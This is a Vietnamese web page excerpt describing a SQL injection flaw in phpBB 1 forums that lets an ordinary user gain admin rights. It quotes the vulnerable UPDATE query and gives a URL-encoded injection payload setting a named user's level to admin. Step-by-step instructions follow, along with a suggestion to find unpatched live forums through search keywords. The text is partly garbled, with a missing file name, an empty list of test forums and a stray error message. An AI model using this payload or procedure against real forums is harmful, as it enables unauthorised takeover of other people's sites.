Tham khảo tài liệu lỗi trong phpbb 1 , công nghệ thông tin, an ninh - bảo mật phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | .Lỗi trong phpBB có phép đoạt quyền Admin : trang này đã được đọc lần Các forum phpBB có một lỗi rất nghiêm trọng cho phép một user bình thường có thể chạy đoạn lệnh cho phép cập nhật vài thông tin trong preferences để có được quyền admin. Một trong số lỗi được tìm thấy trong đoạn code sau: $sql = "UPDATE users SET user_viewemail='$viewemail', user_theme='$themes', user_attachsig = '$sig', user_desmile = '$smile', user_html = '$dishtml', user_bbcode = '$disbbcode', user_lang = '$lang' WHERE (user_id = '$userdata[user_id]'"; Để khai thác, ta chạy lệnh modify prefereces trong file , bằng cách xác định một giá trị cụ thể cho biến viewemail. Vd sau sẽ đặt cho một username maxx có quyền admin (privilege level 4): http://sitename/phpBBfolder/',user_level%3D'4'%20where%20username%3D'maxx'%23 Lệnh này sẽ chạy lệnh sql cập nhật thông tin về viewemail đồng thời cả user_level. Như vậy, các bước cần thiết để thử test hack một forum dạng này như sau: - Đăng kí 1 acc - Login vào với acc vừa đăng kí - Chạy link ở vd trên - Nếu thiết lập preferences thành công (ko báo lỗi), bạn return lại forum index và vào Administration Panel ở cuối forum. Lưu ý có một vài forum sau khi set preferences thành công, vẫn ko thấy Administration Panel, bạn có thể thử vào theo link sau: /phpBBfolder/admin/ (như forum ở dưới) Một vài forum thử nghiệm: Các bạn có thể tìm thêm các forum phpBB chưa fix trên net, search theo từ khóa ví dụ như: "powered phpbb " Error! Unknown switch argument.
